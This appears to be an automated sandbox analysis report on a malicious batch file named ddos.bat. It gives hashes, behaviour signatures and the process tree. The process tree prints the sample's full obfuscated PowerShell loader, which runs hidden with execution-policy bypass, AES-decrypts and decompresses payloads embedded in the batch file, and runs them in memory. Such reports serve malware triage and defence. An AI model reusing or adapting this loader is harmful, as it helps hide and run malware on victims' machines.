Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
19/04/2023, 12:48
General
-
Target
ddos.bat
-
Size
13.6MB
-
MD5
c9a6186fbe27904439dc86cbb5b99b63
-
SHA1
c0db0f28d1e9b501b9d4895c81afc75e13cb0774
-
SHA256
6ad553540149c82ab1ac85d37944e06ee9826c834c8388eb72cfd5f480525ceb
-
SHA512
65c1daaccb653427e01ba3e047465c443ca1b69dd644868f84ba50e86227039076f531208d3025d835660fe3230fbb3f114438a79183e6dc83dcdb935d96d185
-
SSDEEP
49152:D93mbEKzzOk10PbxBNOXT3mnDG6xlobNZ+hsoO0BrxYUpnkKILeAaco6s0Xy/Kcy:A
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ddos.bat.exe"ddos.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function FpkiB($YdHmF){ $GvRDH=[System.Security.Cryptography.Aes]::Create(); $GvRDH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GvRDH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GvRDH.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yb/sQnv1LYw7DPhrH9M2+a0n2ERdGkY1aWnaG8wqSw4='); $GvRDH.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N56ByYz40xgwZvoDoOHriw=='); $msECO=$GvRDH.CreateDecryptor(); $return_var=$msECO.TransformFinalBlock($YdHmF, 0, $YdHmF.Length); $msECO.Dispose(); $GvRDH.Dispose(); $return_var;}function VAOuS($YdHmF){ $lunUV=New-Object System.IO.MemoryStream(,$YdHmF); $uJPUk=New-Object System.IO.MemoryStream; $GLVci=New-Object System.IO.Compression.GZipStream($lunUV, [IO.Compression.CompressionMode]::Decompress); $GLVci.CopyTo($uJPUk); $GLVci.Dispose(); $lunUV.Dispose(); $uJPUk.Dispose(); $uJPUk.ToArray();}function tZCne($YdHmF,$PVnCP){ $OStcp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YdHmF); $JGYEu=$OStcp.EntryPoint; $JGYEu.Invoke($null, $PVnCP);}$tUkTR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ddos.bat').Split([Environment]::NewLine);foreach ($kUNVs in $tUkTR) { if ($kUNVs.StartsWith(':: ')) { $hzQqb=$kUNVs.Substring(3); break; }}$FvIAX=[string[]]$hzQqb.Split('\');$qcDov=VAOuS (FpkiB ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FvIAX[0])));$Lxsns=VAOuS (FpkiB ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FvIAX[1])));tZCne $Lxsns (,[string[]] (''));tZCne $qcDov (,[string[]] (''));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
12KB
-
Filesize
220KB